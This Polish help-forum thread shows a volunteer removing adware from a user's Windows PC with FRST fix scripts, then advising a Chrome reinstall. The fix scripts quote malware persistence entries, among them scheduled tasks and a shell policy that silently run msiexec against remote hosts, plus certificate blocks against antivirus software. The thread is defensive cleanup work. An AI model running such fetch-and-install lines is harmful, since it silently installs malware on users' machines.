Lambert Opublikowano 2 Czerwca 2017 Zgłoś Udostępnij Opublikowano 2 Czerwca 2017 Witam! Mam bardzo podobny problem co do reszty tutaj postów. Używam Chrome'a i Firefoxa i obie zostały zamienione na te zainfekowane adware'em. Jako główną stronę mam "wyszukiwarkę" initialsite123, po wyszukiwaniu nią czegoś, ukazują się wyniki z wyszukiwarki DealWiFi, jeszcze dostałem ikonki Big'ów na pulpit. Chciałem wszystko wyczyścić AdwCleanerem (antyvirusy nie dały rady) ale nie dało się zainstalować (Błąd systemu plików 65535), podobnie było z wieloma innymi programami tego typu. Dołączam pliczki z FRST i GMER. GMER.txt Addition.txt FRST.txt Shortcut.txt Odnośnik do komentarza
picasso Opublikowano 4 Czerwca 2017 Zgłoś Udostępnij Opublikowano 4 Czerwca 2017 Adware wprowadziło blokadę programów zabezpieczających w oparciu o funkcję Niezaufanych certyfikatów, dlatego nie da się uruchomić m.in. AdwCleaner (blokada certyfikatu Malwarebytes). Poza tym są tu fałszywe przeglądarki "Chrome" i "Firefox" i masa innych śmieci. Działania do przeprowadzenia:1. Przez Panel sterowania odinstaluj niepożądany program YAC(Yet Another Cleaner!).2. Uruchom FRST. Z klawiatury CTRL+Y, zostanie otworzony plik fixlist.txt. Wklej do pliku następującą treść:CloseProcesses:CreateRestorePoint:HKLM\ DisallowedCertificates: 03D22C9C66915D58C88912B64C1F984B8344EF09 (Avast Antivirus/Software) HKLM\ DisallowedCertificates: 0F684EC1163281085C6AF20528878103ACEFCAAB (Avast Antivirus/Software) HKLM\ DisallowedCertificates: 1667908C9E22EFBD0590E088715CC74BE4C60884 (Avast Antivirus/Software) HKLM\ DisallowedCertificates: 18DEA4EFA93B06AE997D234411F3FD72A677EECE (Avast Antivirus/Software) HKLM\ DisallowedCertificates: 2026D13756EB0DB753DF26CB3B7EEBE3E70BB2CF (Avast Antivirus/Software) HKLM\ DisallowedCertificates: 249BDA38A611CD746A132FA2AF995A2D3C941264 (Avast Antivirus/Software) HKLM\ DisallowedCertificates: 31AC96A6C17C425222C46D55C3CCA6BA12E54DAF (Avast Antivirus/Software) HKLM\ DisallowedCertificates: 331E2046A1CCA7BFEF766724394BE6112B4CA3F7 (Avast Antivirus/Software) HKLM\ DisallowedCertificates: 3353EA609334A9F23A701B9159E30CB6C22D4C59 (Avast Antivirus/Software) HKLM\ DisallowedCertificates: 373C33726722D3A5D1EDD1F1585D5D25B39BEA1A (Avast Antivirus/Software) HKLM\ DisallowedCertificates: 3850EDD77CC74EC9F4829AE406BBF9C21E0DA87F (Avast Antivirus/Software) HKLM\ DisallowedCertificates: 3D496FA682E65FC122351EC29B55AB94F3BB03FC (Avast Antivirus/Software) HKLM\ DisallowedCertificates: 4243A03DB4C3C15149CEA8B38EEA1DA4F26BD159 (Avast Antivirus/Software) HKLM\ DisallowedCertificates: 42727E052C0C2E1B35AB53E1005FD9EDC9DE8F01 (Avast Antivirus/Software) HKLM\ DisallowedCertificates: 4420C99742DF11DD0795BC15B7B0ABF090DC84DF (Avast Antivirus/Software) HKLM\ DisallowedCertificates: 4C0AF5719009B7C9D85C5EAEDFA3B7F090FE5FFF (Avast Antivirus/Software) HKLM\ DisallowedCertificates: 5240AB5B05D11B37900AC7712A3C6AE42F377C8C (Avast Antivirus/Software) HKLM\ DisallowedCertificates: 5DD3D41810F28B2A13E9A004E6412061E28FA48D (Avast Antivirus/Software) HKLM\ DisallowedCertificates: 637162CC59A3A1E25956FA5FA8F60D2E1C52EAC6 (Avast Antivirus/Software) HKLM\ DisallowedCertificates: 7457A3793086DBB58B3858D6476889E3311E550E (Avast Antivirus/Software) HKLM\ DisallowedCertificates: 76A9295EF4343E12DFC5FE05DC57227C1AB00D29 (Avast Antivirus/Software) HKLM\ DisallowedCertificates: 775B373B33B9D15B58BC02B184704332B97C3CAF (Avast Antivirus/Software) HKLM\ DisallowedCertificates: 7D7F4414CCEF168ADF6BF40753B5BECD78375931 (Avast Antivirus/Software) HKLM\ DisallowedCertificates: 872CD334B7E7B3C3D1C6114CD6B221026D505EAB (Avast Antivirus/Software) HKLM\ DisallowedCertificates: 88AD5DFE24126872B33175D1778687B642323ACF (Avast Antivirus/Software) HKLM\ DisallowedCertificates: 9132E8B079D080E01D52631690BE18EBC2347C1E (Avast Antivirus/Software) HKLM\ DisallowedCertificates: 982D98951CF3C0CA2A02814D474A976CBFF6BDB1 (Avast Antivirus/Software) HKLM\ DisallowedCertificates: 9A08641F7C5F2CCA0888388BE3E5DBDDAAA3B361 (Avast Antivirus/Software) HKLM\ DisallowedCertificates: 9C43F665E690AB4D486D4717B456C5554D4BCEB5 (Avast Antivirus/Software) HKLM\ DisallowedCertificates: 9E3F95577B37C74CA2F70C1E1859E798B7FC6B13 (Avast Antivirus/Software) HKLM\ DisallowedCertificates: A1F8DCB086E461E2ABB4B46ADCFA0B48C58B6E99 (Avast Antivirus/Software) HKLM\ DisallowedCertificates: A5341949ABE1407DD7BF7DFE75460D9608FBC309 (Avast Antivirus/Software) HKLM\ DisallowedCertificates: A59CC32724DD07A6FC33F7806945481A2D13CA2F (Avast Antivirus/Software) HKLM\ DisallowedCertificates: AB7E760DA2485EA9EF5A6EEE7647748D4BA6B947 (Avast Antivirus/Software) HKLM\ DisallowedCertificates: AD4C5429E10F4FF6C01840C20ABA344D7401209F (Avast Antivirus/Software) HKLM\ DisallowedCertificates: AD96BB64BA36379D2E354660780C2067B81DA2E0 (Avast Antivirus/Software) HKLM\ DisallowedCertificates: B8EBF0E696AF77F51C96DB4D044586E2F4F8FD84 (Avast Antivirus/Software) HKLM\ DisallowedCertificates: CDC37C22FE9272D8F2610206AD397A45040326B8 (Avast Antivirus/Software) HKLM\ DisallowedCertificates: D3F78D747E7C5D6D3AE8ABFDDA7522BFB4CBD598 (Avast Antivirus/Software) HKLM\ DisallowedCertificates: DB303C9B61282DE525DC754A535CA2D6A9BD3D87 (Avast Antivirus/Software) HKLM\ DisallowedCertificates: DB77E5CFEC34459146748B667C97B185619251BA (Avast Antivirus/Software) HKLM\ DisallowedCertificates: E22240E837B52E691C71DF248F12D27F96441C00 (Avast Antivirus/Software) HKLM\ DisallowedCertificates: E513EAB8610CFFD7C87E00BCA15C23AAB407FCEF (Avast Antivirus/Software) HKLM\ DisallowedCertificates: ED841A61C0F76025598421BC1B00E24189E68D54 (Avast Antivirus/Software) HKLM\ DisallowedCertificates: F83099622B4A9F72CB5081F742164AD1B8D048C9 (Avast Antivirus/Software) HKLM\ DisallowedCertificates: FBB42F089AF2D570F2BF6F493D107A3255A9BB1A (Avast Antivirus/Software) HKLM\ DisallowedCertificates: FFFA650F2CB2ABC0D80527B524DD3F9FC172C138 (Avast Antivirus/Software) HKLM\...\Policies\Explorer: [EnableShellExecuteHooks] 1HKU\S-1-5-21-489643024-731826354-959299013-1000\...\Run: [GalaxyClient] => [X]HKU\S-1-5-21-489643024-731826354-959299013-1000\...\Run: [background_fault] => C:\Users\Lambert\AppData\Local\background_fault\aswRD.exe [1419576 2017-05-27] (AVAST Software) HKLM\...\Providers\1ol3sxub: C:\Program Files (x86)\Clihotain Configuration\local64spl.dllIFEO\GoogleUpdate.exe: [Debugger] 324095823984.exeIFEO\GoogleUpdaterService.exe: [Debugger] 8736459873644.exeShellExecuteHooks: Brak nazwy - {6A69B0BA-392B-11E7-B267-64006A5CFC23} - C:\Users\Lambert\AppData\Roaming\Prageghtthasuy\Cohispphokisy.dll [145408 2017-05-20] ()ShellIconOverlayIdentifiers: [00asw] -> {472083B0-C522-11CF-8763-00608CC02F24} => -> Brak plikuShellIconOverlayIdentifiers: [00avast] -> {472083B0-C522-11CF-8763-00608CC02F24} => -> Brak plikuWMI_ActiveScriptEventConsumer_ASEC: CHR HomePage: Default -> hxxp://www.luckysearch123.com?type=hp&ts=1495813616&from=ca9a0525&uid=wdcxwd1200js-00mhb0_wd-wcann104216642166&z=7e527a4ccae801a9a9a6823gbz6tcw5b4gdccoceagCHR StartupUrls: Default -> "hxxp://www.luckysearch123.com?type=hp&ts=1495813616&from=ca9a0525&uid=wdcxwd1200js-00mhb0_wd-wcann104216642166&z=7e527a4ccae801a9a9a6823gbz6tcw5b4gdccoceag"HKU\S-1-5-21-489643024-731826354-959299013-1000\...\ChromeHTML: -> C:\Program Files (x86)\Hippig\Application\chrome.exe (Google Inc.) HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.ourluckysites.com/search/?type=ds&ts=1495817398&z=539fb33b098d581863e9993g4z3tcw5b0g1q1t5bbg&from=che0812&uid=WDCXWD1200JS-00MHB0_WD-WCANN104216642166&q={searchTerms}HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Search_URL = hxxp://www.ourluckysites.com/search/?type=ds&ts=1495817398&z=539fb33b098d581863e9993g4z3tcw5b0g1q1t5bbg&from=che0812&uid=WDCXWD1200JS-00MHB0_WD-WCANN104216642166&q={searchTerms}HKU\S-1-5-21-489643024-731826354-959299013-1000\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://www-searching.com/?pid=s&s=H5Kzbcnbl1BU,6a532031-42f4-47fc-916e-b7d6d8da77f6,&vp=ch&prd=set_ieSearchScopes: HKU\S-1-5-21-489643024-731826354-959299013-1000 -> {9A91F84A-3E08-4774-B825-7A6604704214} URL = hxxp://www-searching.com/s.ashx?prd=opensearch&q={searchTerms}&s=H5Kzbcnbl1BU,6a532031-42f4-47fc-916e-b7d6d8da77f6,ShortcutWithArgument: C:\Users\Lambert\Desktop\Gówno\Mozilla Firefox.lnk -> C:\Program Files (x86)\Mozilla Firefox\firefox.exe (Mozilla Corporation) -> hxxp://www-searching.com/?prd=set_epf&s=h5kzbcnbl1bu,6a532031-42f4-47fc-916e-b7d6d8da77f6,ShortcutWithArgument: C:\Users\Lambert\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\Internet Explorer (No Add-ons).lnk -> C:\Program Files (x86)\Internet Explorer\iexplore.exe (Microsoft Corporation) -> hxxp://www.ourluckysites.com/?type=sc&ts=1495817398&z=539fb33b098d581863e9993g4z3tcw5b0g1q1t5bbg&from=che0812&uid=WDCXWD1200JS-00MHB0_WD-WCANN104216642166R2 BIT; C:\ProgramData\BIT\BIT.dll [1812992 2017-06-01] (TODO: ) [brak podpisu cyfrowego] S2 DsSvc; C:\ProgramData\Package Cache\{00C5024D-925C-4E9E-A8E6-F9B84ABE0DA0}\packages\Win81_SDK\9bcb3fab78e80d68be28892ea7ad46c3.msp [84 2017-05-25] () [brak podpisu cyfrowego]R2 FirefoxU; C:\Program Files (x86)\Firefox\bin\FirefoxUpdate.exe [98456 2017-05-25] () S2 glory; C:\Users\Lambert\AppData\Local\glory\glory.dll [909824 2017-06-01] (glory) [brak podpisu cyfrowego] R2 WinSAPSvc; C:\Users\Lambert\AppData\Roaming\WinSAPSvc\WinSAP.dll [1886720 2017-06-01] () [brak podpisu cyfrowego] U3 aswbdisk; Brak ImagePathU2 snare; Brak ImagePathS4 sptd; \SystemRoot\System32\Drivers\sptd.sys [X]U2 terana; Brak ImagePathS3 VGPU; System32\drivers\rdvgkmd.sys [X]S3 xhunter1; \??\C:\Windows\xhunter1.sys [X]Task: {032BAD74-97C2-43DE-B45B-88930DDF692F} - System32\Tasks\{D7AFBC4C-4474-49BE-80F6-F744826C4525} => C:\Program Files (x86)\Diablo II\Diablo II.exeTask: {2F04D6BD-444A-40B0-9AAF-7E16B78A5008} - System32\Tasks\{C3660774-1430-4C6F-8E8D-021096A1846D} => C:\Users\Lambert\Desktop\adwcleaner_6.040.exe [2016-12-03] ()Task: {494E40C4-7065-4724-A0CD-372B912DCB61} - System32\Tasks\Milimili => C:\Program Files (x86)\MIO\MIO.exe [2017-06-01] () Task: {55CA615F-492D-4305-B18F-FC520019D725} - System32\Tasks\{C5C828EA-3D5C-4845-B204-7FE4C2AE81FA} => pcalua.exe -a "C:\Users\Lambert\Desktop\SERIE A OFFICIAL HD KIT PACK V1 2016-17\ModdingWayInstaller.exe" -d "C:\Users\Lambert\Desktop\SERIE A OFFICIAL HD KIT PACK V1 2016-17"Task: {93CDB1CB-5A6C-4B17-925E-CA176B66A3E4} - System32\Tasks\Overwolf Updater Task => C:\Program Files (x86)\Overwolf\OverwolfUpdater.exeTask: {CB1675FB-1CFE-4EA8-B420-931065D8D9E8} - System32\Tasks\Keyboard Checksum Verifier => Rundll32.exe "C:\Program Files\Keyboard Checksum Verifier\Keyboard Checksum Verifier.dll",xVbAXgKyhTask: {CB4D2BD4-C91B-46A3-ACDC-B7BAFFF58620} - System32\Tasks\Arujogh Cloud => C:\Program Files (x86)\Walchshjit\yaupdcache.exeTask: {DB4CEECD-3E4F-4CF8-90E1-AC0086D93F9C} - System32\Tasks\IBUpd2 => C:\Users\Lambert\AppData\Local\BrowserAir\48.0.0.0\updater.exe Task: {E5191DB7-0019-441E-A4BD-7057B820C5F5} - System32\Tasks\Clihotain Configuration => C:\Program Files (x86)\Walchshjit\ficult.exeTask: {E81B7F83-F695-4905-BD35-AAD17C8649AE} - System32\Tasks\Microsoft\Windows\DeviceSettings\Thupetherbeqerph => msiexec.exe /i hxxp://D2bUH1bF1g584W.clOuDfroNt.net/mmtsk/occup.php?p=WDCXWD1200JS-00MHB0_WD-WCANN104216642166&d=20170520 /q Task: {E976FE0B-314A-4A6F-AF68-E8A931C88CFB} - System32\Tasks\Trojan Remover => C:\Program Files\Loaris Trojan Remover\ltr.exeTask: {FA76DE69-D3A4-481C-BF44-2C2DC557314C} - System32\Tasks\SMW_UpdateTask_Time_3835313734393736322d2355786c325a5b5734412d34 => Wscript.exe //B "C:\ProgramData\SearchModule\smhe.js" smu.exe /invoke /f:check_services /l:0 Task: {FE9FF048-6797-4E07-AA29-BBDCC273E036} - System32\Tasks\{F688C87D-DD38-4E0F-9D49-BFF7ECC53E4D} => pcalua.exe -a "C:\Users\Lambert\Desktop\SERIE A OFFICIAL HD KIT PACK V1 2016-17\ModdingWayInstaller.exe" -d "C:\Users\Lambert\Desktop\SERIE A OFFICIAL HD KIT PACK V1 2016-17"DeleteKey: HKCU\Software\Google\Chrome\ExtensionsDeleteKey: HKCU\Software\MozillaPluginsDeleteKey: HKLM\SOFTWARE\MozillaPluginsDeleteKey: HKLM\SOFTWARE\Wow6432Node\Mozilla\Firefox\ExtensionsDeleteKey: HKLM\SOFTWARE\Wow6432Node\MozillaPluginsCMD: netsh advfirewall resetC:\$AV_ASWC:\CosuspC:\PipisyC:\Program Files\1ol3sxubC:\Program Files\AVAST SoftwareC:\Program Files\Keyboard Checksum VerifierC:\Program Files\MKC:\Program Files\Common Files\509E0C:\Program Files\Common Files\NoobzoC:\Program Files (x86)\Clihotain ConfigurationC:\Program Files (x86)\FirefoxC:\Program Files (x86)\HippigC:\Program Files (x86)\MIOC:\Program Files (x86)\WalchshjitC:\ProgramData\log.binbC:\ProgramData\log.ewbbC:\ProgramData\log.ewbtC:\ProgramData\.monoC:\ProgramData\AVAST SoftwareC:\ProgramData\BITC:\ProgramData\LoarisC:\ProgramData\SearchModuleC:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnkC:\ProgramData\Microsoft\Windows\Start Menu\Programs\Mozilla Firefox.lnkC:\ProgramData\Microsoft\Windows\Start Menu\Programs\Max Payne-ROKA1969.lnkC:\ProgramData\Microsoft\Windows\Start Menu\Programs\Diablo IIC:\ProgramData\Microsoft\Windows\Start Menu\Programs\Kolekcja KlasykiC:\ProgramData\Microsoft\Windows\Start Menu\Programs\San Andreas MultiplayerC:\ProgramData\Microsoft\Windows\Start Menu\Programs\TP-LINKC:\ProgramData\Microsoft\Windows\Start Menu\Programs\YeaDesktopC:\ProgramData\Package Cache\{00C5024D-925C-4E9E-A8E6-F9B84ABE0DA0}C:\StuvatybugtainC:\Users\Lambert\AppData\Local\{CDB39C7B-51CB-4A3E-BDF9-8D90DE43D449}C:\Users\Lambert\AppData\Local\AdvinstAnalyticsC:\Users\Lambert\AppData\Local\background_faultC:\Users\Lambert\AppData\Local\BrowserAirC:\Users\Lambert\AppData\Local\FirefoxC:\Users\Lambert\AppData\Local\gloryC:\Users\Lambert\AppData\Local\HippigC:\Users\Lambert\AppData\Local\kemgadeojglibflomicgnfeopkdfflnkC:\Users\Lambert\AppData\Local\PhoceshgrherryC:\Users\Lambert\AppData\Local\snareC:\Users\Lambert\AppData\Local\teranaC:\Users\Lambert\AppData\Local\THQC:\Users\Lambert\AppData\Roaming\AVAST SoftwareC:\Users\Lambert\AppData\Roaming\DAEMON Tools LiteC:\Users\Lambert\AppData\Roaming\Event MonitorC:\Users\Lambert\AppData\Roaming\FirefoxC:\Users\Lambert\AppData\Roaming\GoogleC:\Users\Lambert\AppData\Roaming\MicroleavesC:\Users\Lambert\AppData\Roaming\Mozilla\Firefox\naweriweentcofiseC:\Users\Lambert\AppData\Roaming\PrageghtthasuyC:\Users\Lambert\AppData\Roaming\ShowukC:\Users\Lambert\AppData\Roaming\UCChannelC:\Users\Lambert\AppData\Roaming\WinSAPSvcC:\Users\Lambert\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Google Chrome (2).lnkC:\Users\Lambert\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu\Google Chrome.lnkC:\Users\Lambert\Desktop\AdwCleaner Portable AdwCleaner 5.019 PLC:\Users\Lambert\Desktop\Gówno\Battlefield 1942.lnkC:\Users\Lambert\Desktop\Gówno\Counter-Strike Source.lnkC:\Users\Lambert\Desktop\Gówno\DAEMON Tools Lite.lnkC:\Users\Lambert\Desktop\Gówno\Diablo III.lnkC:\Users\Lambert\Desktop\Gówno\Grand Theft Auto Vice City.lnkC:\Users\Lambert\Desktop\Gówno\GTA Vice City.lnkC:\Users\Lambert\Desktop\Gówno\MassEffectConfig.lnkC:\Users\Lambert\Desktop\Gówno\Quick Server.lnkC:\Users\Lambert\Desktop\Gówno\San Andreas Multiplayer.lnkC:\Users\Lambert\Desktop\Gówno\Skype.lnkC:\Users\Lambert\Desktop\Gówno\Spartan.lnkC:\Users\Lambert\Downloads\AdwCleaner*.exeC:\Users\Lambert\Downloads\Emsisoft*.exeC:\Users\Lambert\Downloads\Loaris*.exeC:\Users\Lambert\Downloads\Malwarebytes*.exeC:\Users\Lambert\Downloads\ReimageRepair.exeC:\Users\Public\Desktop\Google Chrome.lnkC:\Users\Public\Desktop\Mozilla Firefox.lnkC:\Users\Public\Documents\report.datC:\Users\Public\Documents\temp.datC:\Windows\Reimage.iniC:\Windows\csrss.exeC:\Windows\taskmgr.exeC:\Windows\AzartC:\Windows\system32\Drivers\*.tmpC:\Windows\system32\logHosts:EmptyTemp: Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach. Z klawiatury CTRL+S, by zapisać zmiany. Następnie w oknie FRST klik w Napraw (Fix). Czekaj cierpliwie, nie przerywaj działania. Gdy Fix ukończy pracę, nastąpi restart systemu. W tym samym katalogu skąd uruchamiano FRST powstanie plik fixlog.txt.3. Zostały usunięte skróty do fałszywych przeglądarek, więc zrób ręcznie skróty do prawdziwych. Ustaw wybraną przeglądarkę jako domyślna. Następnie po kolei wyczyść przeglądarki z adware:Firefox:Wyeksportuj zakładki, o ile jest co eksportować. Zamknij Firefox i wywołaj menedżer profilów poprzez klawisz z flagą Windows + R i wklejenie poniższej komendy w polu Uruchom i OK. W menedżerze usuń wszystkie widoczne profile i załóż nowy, zaloguj się na niego."C:\Program files (x86)\Mozilla Firefox\firefox.exe" -pGoogle Chrome: Zresetuj synchronizację (o ile włączona): KLIK. Ustawienia > karta Rozszerzenia > odinstaluj Unlimited Free VPN - Hola. To niepożądane rozszerzenie, powiązane z aktywnością para-botnet Ustawienia > karta Ustawienia > Pokaż ustawienia zaawansowane > zjedź na sam spód i uruchom opcję Resetowanie ustawień. Zakładki i hasła nie zostaną naruszone. Ustawienia > karta Ustawienia > sekcja Szukaj > klik w Zarządzanie wyszukiwarkami > skasuj z listy niedomyślne śmieci (o ile będą). 4. Zrób nowy log FRST z opcji Skanuj (Scan), bez Shortcut. Dołącz też plik fixlog.txt. Odnośnik do komentarza
Lambert Opublikowano 7 Czerwca 2017 Autor Zgłoś Udostępnij Opublikowano 7 Czerwca 2017 Wszystko wykonane, Firefox wydaje się czysty jak łza, w Chromie pozostało coś: w Ustawienia > karta Ustawienia > sekcja Szukaj >Zarządzanie wyszukiwarkami > pozostało tutaj "mystarting123" ustawione jako domyślna wyszukiwarka. Gdy chciałem ustawić jako domyślną Google lub każdą inną, to po ok pół sekundy ponownie jako domyślna ustawiała się mystarting123, w efekcie nie da się jej usunąć, nawet gdy zdążyłem kliknąć button usunięcia przed samoistnym ustawieniem się jako domyślna wyszukiwarka. Ciekawe jest to, że gdy uruchamiam normalnie Chrome'a to ukazuje mi się zwykła domowa wyszukiwarka od Google taka jak jest domyślnie w świeżym Chrome. Uruchomiłem instalator AdwCleanera by sprawdzić czy działa i tak, instalator działa. Nie instalowałem i nie czyściłem sam tym, bo nikt mi tu nie kazał. Pliczki lecą. Dam też Addition na wszelki wypadek. Addition.txt Fixlog.txt FRST.txt Odnośnik do komentarza
picasso Opublikowano 7 Czerwca 2017 Zgłoś Udostępnij Opublikowano 7 Czerwca 2017 Gdy chciałem ustawić jako domyślną Google lub każdą inną, to po ok pół sekundy ponownie jako domyślna ustawiała się mystarting123, w efekcie nie da się jej usunąć, nawet gdy zdążyłem kliknąć button usunięcia przed samoistnym ustawieniem się jako domyślna wyszukiwarka. Ciekawe jest to, że gdy uruchamiam normalnie Chrome'a to ukazuje mi się zwykła domowa wyszukiwarka od Google taka jak jest domyślnie w świeżym Chrome. Czy to zachowanie nadal ma miejsce po użyciu skryptu FRST? Większość zadań wykonana, ale pojawiły się nowe wpisy. Poprawki: 1. Uruchom FRST. Z klawiatury CTRL+Y, zostanie otworzony plik fixlist.txt. Wklej do pliku następującą treść: HKU\S-1-5-21-489643024-731826354-959299013-1000\...\Policies\system: [shell] explorer.exe,msiexec.exe /i hxxp://point.ltdmsjq.com/?data=zDlkMj1YMTNWMUUdRTLXMjZQRUFcNjNLMWVSFjHyMUVLRTFdFc== /q S1 iSafeKrnlMon; \??\C:\Program Files (x86)\Elex-tech\YAC\iSafeKrnlMon.sys [X] ShortcutWithArgument: C:\Users\Lambert\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer (64-bit).lnk -> C:\Program Files\Internet Explorer\iexplore.exe (Microsoft Corporation) -> hxxp://www.yeadesktop.com/ ShortcutWithArgument: C:\Users\Lambert\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer.lnk -> C:\Program Files (x86)\Internet Explorer\iexplore.exe (Microsoft Corporation) -> hxxp://www.yeadesktop.com/ ShortcutWithArgument: C:\Users\Lambert\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Launch Internet-Explorer Browser.lnk -> C:\Program Files (x86)\Internet Explorer\iexplore.exe (Microsoft Corporation) -> hxxp://www.yeadesktop.com/ DeleteKey: HKLM\SOFTWARE\Wow6432Node\Mozilla\Thunderbird RemoveDirectory: C:\AdwCleaner RemoveDirectory: C:\FRST\Quarantine RemoveDirectory: C:\Users\Lambert\Downloads\FRST-OlderVersion StartBatch: del /q C:\Users\Lambert\Desktop\adwcleaner*.* del /q C:\Users\Lambert\Downloads\adwcleaner*.* del /q C:\Users\Lambert\Downloads\qd1y4yyr.exe del /q C:\Users\Lambert\Downloads\SPTDinst-v189-x64.exe del /q C:\Windows\system32\Drivers\iSafeKrnlBoot.sys del /q C:\Windows\system32\Drivers\iSafeNetFilter.sys EndBatch: Z klawiatury CTRL+S, by zapisać zmiany. Następnie w oknie FRST klik w Napraw (Fix). Przedstaw wynikowy fixlog.txt. 2. Spróbuj ponowić usuwanie wyszukiwarki mystarting123.com z Google Chrome. 3. Pobierz z przyklejonego najnowszą wersję AdwCleaner. Następnie uruchom w nim czyszczenie i dostarcz log wynikowy z folderu C:\AdwCleaner. Odnośnik do komentarza
Lambert Opublikowano 10 Czerwca 2017 Autor Zgłoś Udostępnij Opublikowano 10 Czerwca 2017 Zastosowałem FRST, w fixlogu wszystko było dobrze, pomyślnie usunięte. Mimo to dalej mystarting nie chce dać się usunąć. Pod wpływem chwili zrobiłem drugi raz naprawianie FRST, przez co plik fixloga jest zaciemniony (objaśnię później), ale dalej to samo, nie da się usunąć. AdwCleaner zrobił wielką robotę i wyczyścił wszystko oprócz mystartinga (którego wcześniej wyszukał i zaznaczył do usunięcia). Reset komputera, włączam Chrome'a i dalej mystartinga nie idzie skasować. Przeskanowałem 2 raz AdwCleanerem i znalazło 1 zagrożenie - właśnie mystartinga. No to czyszcze i reset. (dlatego są dwa raporty z AdwCleanera, C0 jest pierwszym, C1 drugim). Pale Chrome'a i dalej to samo, mystarting siedzi jak gleń. W tej chwili przeszukałem kompa AdwCleanerem po raz trzeci, i to samo: znalazło tylko mystartinga. Chyba nie było sensu czyszczenie kolejny raz, wiadomo jak by wyszło. Co do fixloga: po drugim fixowaniu FRST, nowy fixlog podmienił tego starszego, przez co taka sytuacja. Objaśnie co było na pierwotnym fixlogu: - w środkowej części tekstu, przy każdym kluczu czy adresie pliku pisało: "(wartość/argument/-) pomyślnie usunięto" - na dole pomiędzy ========= Batch: =========, a ========= Koniec Batch: =========, nie było nic. Zapewnie pliki zostały poprawnie usunięte, skoro na drugim, wysłanym tutaj fixlogu jest napisane, że "nie można odnaleźć". Nie zmieniałem lokalizacji żadnego z tych plików pomiędzy naprawami. Fixlog.txt AdwCleanerC0.txt AdwCleanerC1.txt Odnośnik do komentarza
picasso Opublikowano 21 Czerwca 2017 Zgłoś Udostępnij Opublikowano 21 Czerwca 2017 Mimo to dalej mystarting nie chce dać się usunąć. W innym temacie wykryłam, że modyfikacja siedzi w globalnym pliku resources.pak. Konieczna reinstalacja Google Chrome. Przy deinstalacji zaznacz opcję Usuń także dane przeglądarki, by pozbyć się też zdefektowanego profilu. Odnośnik do komentarza
Rekomendowane odpowiedzi
Jeśli chcesz dodać odpowiedź, zaloguj się lub zarejestruj nowe konto
Jedynie zarejestrowani użytkownicy mogą komentować zawartość tej strony.
Zarejestruj nowe konto
Załóż nowe konto. To bardzo proste!
Zarejestruj sięZaloguj się
Posiadasz już konto? Zaloguj się poniżej.
Zaloguj się